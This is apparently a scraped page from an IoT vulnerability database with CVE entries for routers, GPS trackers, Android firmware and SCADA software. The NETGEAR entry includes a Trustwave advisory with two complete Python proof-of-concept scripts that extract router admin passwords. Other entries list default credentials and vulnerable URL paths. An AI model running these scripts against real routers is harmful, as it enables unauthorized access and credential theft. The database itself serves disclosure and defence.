VARIoT IoT vulnerabilities database


VAR-201712-0218 CVE-2017-5259 Cambium Networks cnPilot firmware vulnerability related to security functions CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, an undocumented, root-privilege administration web shell is available using the HTTP path https://<device-ip-or-hostname>/adm/syscmd.asp. The Cambium Networks cnPilot firmware contains a vulnerability related to security functions. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Cambium Networks cnPilot is a single-frequency router product of Cambium Networks in the United States that supports cloud management. Cambium Networks cnPilot using firmware version 4.3.2-R4 and earlier has security vulnerabilities
VAR-201703-0657 CVE-2017-5237 Eview EV-07S GPS tracker firmware authentication vulnerability CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
Due to a lack of authentication, an unauthenticated user who knows the Eview EV-07S GPS Tracker's phone number can revert the device to a factory default configuration with an SMS command, "RESET!". The Eview EV-07S GPS tracker firmware contains an authentication vulnerability. A denial-of-service (DoS) attack may be carried out. An attacker may exploit this issue to bypass certain security restrictions and perform unauthorized actions. Attackers can use SMS commands to exploit this vulnerability to restore factory settings
VAR-201703-0658 CVE-2017-5238 Eview EV-07S GPS tracker firmware buffer error vulnerability CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
Due to a lack of bounds checking, several input configuration fields for the Eview EV-07S GPS Tracker will overflow data stored in one variable to another, overwriting the data of another field. The Eview EV-07S GPS tracker firmware contains a buffer error vulnerability. Information may be tampered with. The tracker is prone to: 1. a buffer-overflow vulnerability; 2. an information-disclosure vulnerability. Successful exploits can allow attackers to obtain sensitive information or to execute arbitrary code in the context of the affected application. Failed attempts may lead to a denial-of-service condition
VAR-201703-0659 CVE-2017-5239 Eview EV-07S GPS tracker firmware vulnerability related to encryption strength CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Due to a lack of standard encryption when transmitting sensitive information over the internet to a centralized monitoring service, the Eview EV-07S GPS Tracker discloses personally identifying information, such as GPS data and IMEI numbers, to any man-in-the-middle (MitM) listener. The Eview EV-07S GPS tracker firmware contains a vulnerability related to cryptographic strength. Information may be obtained. The tracker is prone to: 1. a buffer-overflow vulnerability; 2. an information-disclosure vulnerability. Successful exploits can allow attackers to obtain sensitive information or to execute arbitrary code in the context of the affected application. Failed attempts may lead to a denial-of-service condition
VAR-201702-0191 CVE-2016-7765 Apple iOS clipboard component information disclosure vulnerability CVSS V2: 2.1
CVSS V3: 2.4
Severity: LOW
An issue was discovered in certain Apple products. iOS before 10.2 is affected. The issue involves the "Clipboard" component, which allows physically proximate attackers to obtain sensitive information in the lockscreen state by viewing clipboard contents. Apple iOS is prone to an information-disclosure vulnerability. An attacker can exploit this issue to obtain sensitive information that may lead to further attacks. Clipboard is one of the system clipboard tools. A local attacker could exploit this vulnerability to access the clipboard contents
VAR-201701-0766 CVE-2017-5521 Multiple NETGEAR device products password disclosure vulnerability CVSS V2: 4.3
CVSS V3: 8.1
Severity: HIGH
An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions. NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900 and R8000 are Netgear's wireless router products. There are information disclosure vulnerabilities in several NETGEAR products. Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks.
Trustwave SpiderLabs Security Advisory TWSL2017-003: Multiple Vulnerabilities in NETGEAR Routers
Published: 01/30/2017
Version: 1.0
Vendor: NETGEAR (http://www.netgear.com/)
Product: Multiple products

Finding 1: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected:
# AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
# D6400 V1.0.0.34_1.3.34
# D6400 V1.0.0.38_1.1.38
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.30_10.0.73
# R6700 V1.0.1.14_10.0.29 (Latest beta)
# R6700 V1.0.0.26_10.0.26 (Latest stable)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.26_1.0.41
# R8500 V1.0.0.56_1.0.28
# R8500 V1.0.0.20_1.0.11
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.29_1.0.29
# VEGN2610 V1.0.0.27_1.0.27
# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.42_1.0.25
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# WN3100RP V1.0.0.14_1.0.19 (Latest)
# WN3100RP V1.0.0.6_1.0.12
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13

Product description: Multiple Netgear Routers

Many Netgear routers are prone to password disclosure via simple crafted requests to the web management server. This can easily be reproduced using the attached poc, or by sending these two simple requests via the browser:
1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token
2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)

## netgore.py
import sys import requests def scrape(text, start_trig, end_trig): if text.find(start_trig) != -1: return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] else: return "i_dont_speak_english" #disable nasty insecure ssl warning requests.packages.urllib3.disable_warnings() #1st stage - get token ip = sys.argv[1] port = sys.argv[2] url = 'http://' + ip + ':' + port + '/' try: r = requests.get(url) except: url = 'https://' + ip + ':' + port + '/' r = requests.get(url, verify=False) model = r.headers.get('WWW-Authenticate') if model is not None: print "Attcking: " + model[13:-1] else: print "not a netgear router" sys.exit(0) token = scrape(r.text, 'unauth.cgi?id=', '\"') if token == 'i_dont_speak_english': print "not vulnerable" sys.exit(0) print "token found: " + token #2nd stage - pass the token - get the password url = url + 'passwordrecovered.cgi?id=' + token r = requests.post(url, verify=False) #profit if r.text.find('left\">') != -1: username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>'))) username = scrape(username, '>', '\'') password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>'))) password = scrape(password, '>', '\'') if username == "i_dont_speak_english": username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>')) password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>')) else: print "not vulnerable becuse password recovery IS set" sys.exit(0) #html encoding pops out of nowhere, lets replace that password = password.replace("&#35;","#") password = password.replace("&","&") print "user: " + username print "pass: " + password
================================
Just run the PoC against a router to get the credentials if it is vulnerable.

Finding 2: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected:
# AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6300 V1.0.0.96_1.1.96 (Latest)
# D6300B V1.0.0.36_1.0.36
# D6300B V1.0.0.32_1.0.32
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.76_1.0.76 (Latest)
# DGN2200v4 V1.0.0.66_1.0.66
# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.56_1.0.43 (Latest)
# R6200 V1.0.1.52_1.0.41
# R6200 V1.0.1.48_1.0.37
# R6200v2 V1.0.3.10_10.1.10 (Latest)
# R6200v2 V1.0.1.20_1.0.18
# R6250 V1.0.4.6_10.1.12 (Latest beta)
# R6250 V1.0.4.2_10.1.10 (Latest stable)
# R6250 V1.0.1.84_1.0.78
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)
# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)
# R6700 V1.0.0.26_10.0.26 (Latest)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R7000 V1.0.4.30_1.1.67
# R7900 V1.0.1.8_10.0.14 (Latest beta)
# R7900 V1.0.1.4_10.0.12 (Latest stable)
# R7900 V1.0.0.10_10.0.7
# R7900 V1.0.0.8_10.0.5
# R7900 V1.0.0.6_10.0.4
# R8000 V1.0.3.26_1.1.18 (Latest beta)
# R8000 V1.0.3.4_1.1.2 (Latest stable)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.30_1.0.43
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.27_1.0.27
# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)
# VEVG2660 V1.0.0.23_1.0.23
# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)
# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)
# WNDR3400v3 V1.0.1.2_1.0.51
# WNDR3400v3 V1.0.0.22_1.0.29
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500 V1.0.1.6_1.0.24
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.50_1.0.30
# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)
# WNR1000v3 V1.0.2.62_60.0.87 (Latest)
# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)
# WNR3500Lv2 V1.2.0.32_40.0.74
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13

Many Netgear routers are prone to password disclosure via simple crafted request to the web management server. This mechanism does not work correctly on the very first request to "passwordrecovered.cgi" and the token is not properly checked; this means that any TOKEN value will result in disclosure of the password. The issue occurs after every reboot of the router. This can easily be reproduced using the attached poc, or by sending a simple request via the browser:
1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)

## netgore2.py
import sys import requests def scrape(text, start_trig, end_trig): if text.find(start_trig) != -1: return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] else: return "i_dont_speak_english" #disable nasty insecure ssl warning requests.packages.urllib3.disable_warnings() #1st stage ip = sys.argv[1] port = sys.argv[2] url = 'http://' + ip + ':' + port + '/' try: r = requests.get(url) except: url = 'https://' + ip + ':' + port + '/' r = requests.get(url, verify=False) model = r.headers.get('WWW-Authenticate') if model is not None: print "Attcking: " + model[13:-1] else: print "not a netgear router" sys.exit(0) #2nd stage url = url + 'passwordrecovered.cgi?id=get_rekt' try: r = requests.post(url, verify=False) except: print "not vulnerable router" sys.exit(0) #profit if r.text.find('left\">') != -1: username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>'))) username = scrape(username, '>', '\'') password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>'))) password = scrape(password, '>', '\'') if username == "i_dont_speak_english": username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>')) password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>')) else: print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again" sys.exit(0) #html encoding pops out of nowhere, lets replace that password = password.replace("&#35;","#") password = password.replace("&","&") print "user: " + username print "pass: " + password
================================
Just run the PoC against a router to get the credentials if it is vulnerable.

Remediation Steps:
Please see NETGEAR's KBA for list of firmware patches for various models.

Revision History:
04/06/2016 - Vulnerability disclosed to vendor
04/19/2016 - Request for update and received confirmation of receipt of the advisories
05/18/2016 - Request for update; no response
07/14/2016 - Request for update
07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage
10/17/2016 - Request for update
12/15/2016 - Notice of intent to publish advisories
01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd
01/30/2017 - Advisory published

References
1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html
2. https://www.exploit-db.com/exploits/32883/
3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply
VAR-201701-0484 CVE-2016-10139 Privilege-granting vulnerability in Adups FOTA com.adups.fota and com.adups.fota.sysoper running on BLU R1 HD devices CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
An issue was discovered on BLU R1 HD devices with Shanghai Adups software. The two package names involved in the exfiltration are com.adups.fota and com.adups.fota.sysoper. In the com.adups.fota.sysoper app's AndroidManifest.xml file, it sets the android:sharedUserId attribute to a value of android.uid.system which makes it execute as the system user, which is a very privileged user on the device. Therefore, the app executing as the system user has been granted a number of powerful permissions even though they are not present in the com.adups.fota.sysoper app's AndroidManifest.xml file. This app provides the com.adups.fota app access to the user's call log, text messages, and various device identifiers through the com.adups.fota.sysoper.provider.InfoProvider component. The com.adups.fota app uses timestamps when it runs and is eligible to exfiltrate the user's PII every 72 hours. If 72 hours have passed since the value of the timestamp, then the exfiltration will be triggered by the user plugging in the device to charge or when they leave or enter a wireless network. The exfiltration occurs in the background without any user interaction. Adups Fota is a professional wireless upgrade solution provided by Shanghai IoT Technology Co., Ltd. (Adups) for IoT devices (smart cars, wearables, homes, VR, etc.). Adups has multiple local privilege escalation vulnerabilities. An attacker could use this vulnerability to elevate privileges. Local attackers can exploit these issues to gain elevated privileges
VAR-201701-0480 CVE-2016-10135 LG devices using the MTK chipset: vulnerability allowing access by arbitrary third-party applications CVSS V2: 4.3
CVSS V3: 5.5
Severity: MEDIUM
An issue was discovered on LG devices using the MTK chipset with L(5.0/5.1), M(6.0/6.0.1), and N(7.0) software, and RCA Voyager Tablet, BLU Advance 5.0, and BLU R1 HD devices. The MTKLogger app with a package name of com.mediatek.mtklogger has application components that are accessible to any application that resides on the device. Namely, the com.mediatek.mtklogger.framework.LogReceiver and com.mediatek.mtklogger.framework.MTKLoggerService application components are exported since they contain an intent filter, are not protected by a custom permission, and do not explicitly set the android:exported attribute to false. Therefore, these components are exported by default and are thus accessible to any third party application by using an android.content.Intent object for communication. These application components can be used to start and stop the logs using Intent objects with embedded data. The available logs are the GPS log, modem log, network log, and mobile log. The base directory that contains the directories for the 4 types of logs is /sdcard/mtklog which makes them accessible to apps that require the READ_EXTERNAL_STORAGE permission. The GPS log contains the GPS coordinates of the user as well as a timestamp for the coordinates. The modem log contains AT commands and their parameters which allow the user's outgoing and incoming calls and text messages to be obtained. The network log is a tcpdump network capture. The mobile log contains the Android log, which is not available to third-party apps as of Android 4.1. The LG ID is LVE-SMP-160019. LG devices using the MTK chipset contain a vulnerability that allows access by arbitrary third-party applications. Lgmobile is an Android smartphone line owned by LG. There are multiple security bypass vulnerabilities in several LG Android mobile devices. An attacker could exploit the vulnerability to bypass certain security restrictions and perform unauthorized operations
VAR-201701-0483 CVE-2016-10138 Adups FOTA com.adups.fota.sysoper running on BLU Advance 5.0 and BLU R1 HD devices vulnerable to man-in-the-middle attacks CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
An issue was discovered on BLU Advance 5.0 and BLU R1 HD devices with Shanghai Adups software. The com.adups.fota.sysoper app is installed as a system app and cannot be disabled by the user. In the com.adups.fota.sysoper app's AndroidManifest.xml file, it sets the android:sharedUserId attribute to a value of android.uid.system which makes it execute as the system user, which is a very privileged user on the device. The app has an exported broadcast receiver named com.adups.fota.sysoper.WriteCommandReceiver which any app on the device can interact with. Therefore, any app can send a command embedded in an intent which will be executed by the WriteCommandReceiver component which is executing as the system user. The third-party app, utilizing the WriteCommandReceiver, can perform the following actions: call a phone number, factory reset the device, take pictures of the screen, record the screen in a video, install applications, inject events, obtain the Android log, and others. In addition, the com.adups.fota.sysoper.TaskService component will make a request to a URL of http://rebootv5.adsunflower.com/ps/fetch.do where the commands in the String array with a key of sf in the JSON Object sent back by the server will be executed as the system user. Since the connection is made via HTTP, it is vulnerable to a MITM attack. The Adups FOTA com.adups.fota.sysoper app running on BLU Advance 5.0 and BLU R1 HD devices is vulnerable to man-in-the-middle (MITM) attacks with unspecified impact: a third-party application, or a MITM attack on the HTTP connection, may cause an unspecified impact. Adups Fota is a professional wireless upgrade solution provided by Shanghai Guangsheng Information Technology Co., Ltd. (Adups) for IoT devices (smart cars, wearables, homes, VR, etc.). Adups has an information disclosure vulnerability. A remote attacker could use the vulnerability to execute arbitrary instructions. Adups Fota is prone to an information-disclosure vulnerability. Remote attackers can exploit this issue to gain access to sensitive information. This may aid in further attacks
VAR-201701-0482 CVE-2016-10137 Adups FOTA com.adups.fota.sysoper running on BLU R1 HD devices file read vulnerability CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
An issue was discovered on BLU R1 HD devices with Shanghai Adups software. The content provider named com.adups.fota.sysoper.provider.InfoProvider in the app with a package name of com.adups.fota.sysoper allows any app on the device to read, write, and delete files as the system user. In the com.adups.fota.sysoper app's AndroidManifest.xml file, it sets the android:sharedUserId attribute to a value of android.uid.system which makes it execute as the system user, which is a very privileged user on the device. This allows a third-party app to read, write, and delete the user's sent and received text messages and call log. This allows a third-party app to obtain PII from the user without permission to do so. Adups Fota is a professional wireless upgrade solution provided by Shanghai Guangsheng Information Technology Co., Ltd. (Adups) for IoT devices (smart cars, wearables, homes, VR, etc.). Adups has a local privilege elevation vulnerability. Attackers can use the vulnerability to obtain privileged information and elevate permissions. Local attackers can exploit this issue to gain elevated privileges
VAR-201701-0481 CVE-2016-10136 Adups FOTA com.adups.fota.sysoper running on BLU R1 HD devices file read vulnerability CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
An issue was discovered on BLU R1 HD devices with Shanghai Adups software. The content provider named com.adups.fota.sysoper.provider.InfoProvider in the app with a package name of com.adups.fota.sysoper allows any app on the device to read, write, and delete files as the system user. In the com.adups.fota.sysoper app's AndroidManifest.xml file, it sets the android:sharedUserId attribute to a value of android.uid.system which makes it execute as the system user, which is a very privileged user on the device. This allows a third-party app to read, write, and delete files owned by the system user. The third-party app can modify the /data/system/users/0/settings_secure.xml file to add an app as a notification listener to be able to receive the text of notifications as they are received on the device. This also allows the /data/system/users/0/accounts.db to be read which contains authentication tokens for various accounts on the device. The third-party app can obtain privileged information and also modify files to obtain more privileges on the device. Adups Fota is a professional wireless upgrade solution provided by Shanghai Guangsheng Information Technology Co., Ltd. (Adups) for IoT devices (smart cars, wearables, homes, VR, etc.). Adups has a local information disclosure vulnerability. Adups is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information and perform unauthorized actions. Failed attacks will cause denial-of-service conditions
VAR-201702-0675 CVE-2017-5154 Advantech WebAccess SQL injection vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
An issue was discovered in Advantech WebAccess Version 8.1. To be able to exploit the SQL injection vulnerability, an attacker must supply malformed input to the WebAccess software. A successful attack could result in administrative access to the application and its data files. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess. Authentication is required to exploit this vulnerability, but can be easily bypassed. The specific flaw exists within updateTemplate.aspx. The vulnerability is caused by lack of input validation before using a remotely supplied string to construct SQL queries. An attacker can use this vulnerability to disclose passwords of administrative accounts used by Advantech WebAccess. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A SQL injection vulnerability exists in Advantech WebAccess version 8.1. Advantech WebAccess is prone to an SQL-injection vulnerability and an authentication-bypass vulnerability. An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions, modify the logic of SQL queries, compromise the software, retrieve information, or modify data; other consequences are possible as well. WebAccess 8.1 is vulnerable; other versions may also be affected
VAR-201702-0673 CVE-2017-5152 Advantech WebAccess security bypass vulnerability CVSS V2: 6.4
CVSS V3: 9.1
Severity: CRITICAL
An issue was discovered in Advantech WebAccess Version 8.1. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access pages unrestricted (AUTHENTICATION BYPASS). This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess. Authentication is required to exploit this vulnerability, but can be easily bypassed. The specific flaw exists within updateTemplate.aspx. The vulnerability is caused by lack of input validation before using a remotely supplied string to construct SQL queries. An attacker can use this vulnerability to disclose passwords of administrative accounts used by Advantech WebAccess. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A security bypass vulnerability exists in Advantech WebAccess version 8.1. An attacker could exploit the vulnerability to bypass certain security restrictions and perform unauthorized operations. Advantech WebAccess is prone to an SQL-injection vulnerability and an authentication-bypass vulnerability. WebAccess 8.1 is vulnerable; other versions may also be affected
VAR-201702-0696 CVE-2017-5144 Carlo Gavazzi VMU-C EM and VMU-C PV firmware vulnerability allowing access to application functions without authentication CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. The access control flaw allows access to most application functions without authentication. Carlo Gavazzi Automation VMU-C EM and VMU-C PV are control modules in the automation products of Italy's Carlo Gavazzi Automation. There are unauthorized access vulnerabilities in Carlo Gavazzi Automation VMU-C EM and VMU-C PV. An unauthenticated attacker can exploit the vulnerability to access a device, obtain sensitive information and perform unauthorized operations. Multiple Carlo Gavazzi products are prone to an unauthorized-access vulnerability, a cross-site request-forgery vulnerability and an information-disclosure vulnerability. Other attacks are also possible. An attacker could exploit this vulnerability to change configuration parameters.
*VMU-C Web-Server solution for photovoltaic applications*
VMU-C EM is a data logger system for small to medium projects, VMUC-Y EM is a hardware data aggregator for medium to larger projects and Em2 Server is a software solution for large projects. They are designed to complement the extensive line of Carlo Gavazzi energy meters and current transformers.
*1. Weak Credentials Management*
-> admin/admin
-> Application does not enforce mandatory password change
*2. Sensitive Information stored in clear-text*
- Accounts menu option shows username and password
- passwords shown in clear-text
- SMTP server password
- user and service passwords are stored in clear-text
*3. Access Control flaws*
1. Access control is not enforced correctly
2. Certain application functions can be accessed without any authentication
3. Application stores the Energy / Plant data in a sqlite database - EWPlant.db. Anyone can dump the plant database file - without any authentication
*4. Reflected + Stored XSS - multiple URLs, parameters* - Not documented in ICS-CERT Advisory
Successful exploitation of this vulnerability could allow an unauthenticated attacker to inject arbitrary JavaScript in a specially crafted URL request where the response containing user data is returned to the web browser without being made safe to display.
*5. Vulnerable to Cross-Site Request Forgery*
There is no CSRF Token generated per page and / or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration.
VAR-201702-0697 CVE-2017-5145 Carlo Gavazzi VMU-C EM and VMU-C PV firmware cross-site request forgery vulnerability CVSS V2: 7.5
CVSS V3: 10.0
Severity: CRITICAL
An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. Successful exploitation of this CROSS-SITE REQUEST FORGERY (CSRF) vulnerability can allow execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. Carlo Gavazzi Automation VMU-C EM and VMU-C PV are control modules in the automation products of Italy's Carlo Gavazzi Automation. There is a cross-site request forgery vulnerability in Carlo Gavazzi Automation VMU-C EM and VMU-C PV. A remote attacker can exploit the vulnerability by constructing a malicious URL and tricking a user into opening it, so that malicious actions are performed in the context of the target user. Exploiting these issues may allow a remote attacker to gain access to sensitive information, or perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible. An attacker could exploit the vulnerability to perform unauthorized operations.
*VMU-C Web-Server solution for photovoltaic applications* VMU-C EM is a data logger system for small to medium projects, VMUC-Y EM is a hardware data aggregator for medium to larger projects and Em2 Server is a software solution for large projects. They are designed to complement the extensive line of Carlo Gavazzi energy meters and current transformers.
*1. Weak Credentials Management* -> admin/admin -> Application does not enforce mandatory password change
*2. Sensitive Information stored in clear-text* Accounts menu option shows username and password; passwords shown in clear-text; SMTP server password; user and service passwords are stored in clear-text
*3. Access Control flaws* 1. Access control is not enforced correctly 2. Certain application functions can be accessed without any authentication 3. Application stores the Energy / Plant data in a sqlite database - EWPlant.db. Anyone can dump plant database file - without any authentication
*4. Reflected + Stored XSS - multiple URLs, parameters - *Not documented in ICS-CERT Advisory* Successful exploitation of this vulnerability could allow an unauthenticated attacker to inject arbitrary JavaScript in a specially crafted URL request where the response containing user data is returned to the web browser without being made safe to display.
*5. +++++
VAR-201702-0698 CVE-2017-5146 Carlo Gavazzi VMU-C EM and VMU-C PV firmware cleartext storage of sensitive information vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. Sensitive information is stored in clear-text. Carlo Gavazzi VMU-C EM and VMU-C PV firmware contains a vulnerability that allows important information to be stored in clear text. Important information may be stored in clear text. Carlo Gavazzi Automation VMU-C EM and VMU-C PV are control modules in the automation products of Italy's Carlo Gavazzi Automation. Multiple Carlo Gavazzi products are prone to an unauthorized-access vulnerability, a cross-site request-forgery vulnerability and an information-disclosure vulnerability. Exploiting these issues may allow a remote attacker to gain access to sensitive information, or perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
*VMU-C Web-Server solution for photovoltaic applications* VMU-C EM is a data logger system for small to medium projects, VMUC-Y EM is a hardware data aggregator for medium to larger projects and Em2 Server is a software solution for large projects. They are designed to complement the extensive line of Carlo Gavazzi energy meters and current transformers.
*1. Weak Credentials Management* -> admin/admin -> Application does not enforce mandatory password change
*2. Access Control flaws* 1. Access control is not enforced correctly 2. Certain application functions can be accessed without any authentication 3. Application stores the Energy / Plant data in a sqlite database - EWPlant.db. Anyone can dump plant database file - without any authentication
*4. Reflected + Stored XSS - multiple URLs, parameters - *Not documented in ICS-CERT Advisory* Successful exploitation of this vulnerability could allow an unauthenticated attacker to inject arbitrary JavaScript in a specially crafted URL request where the response containing user data is returned to the web browser without being made safe to display.
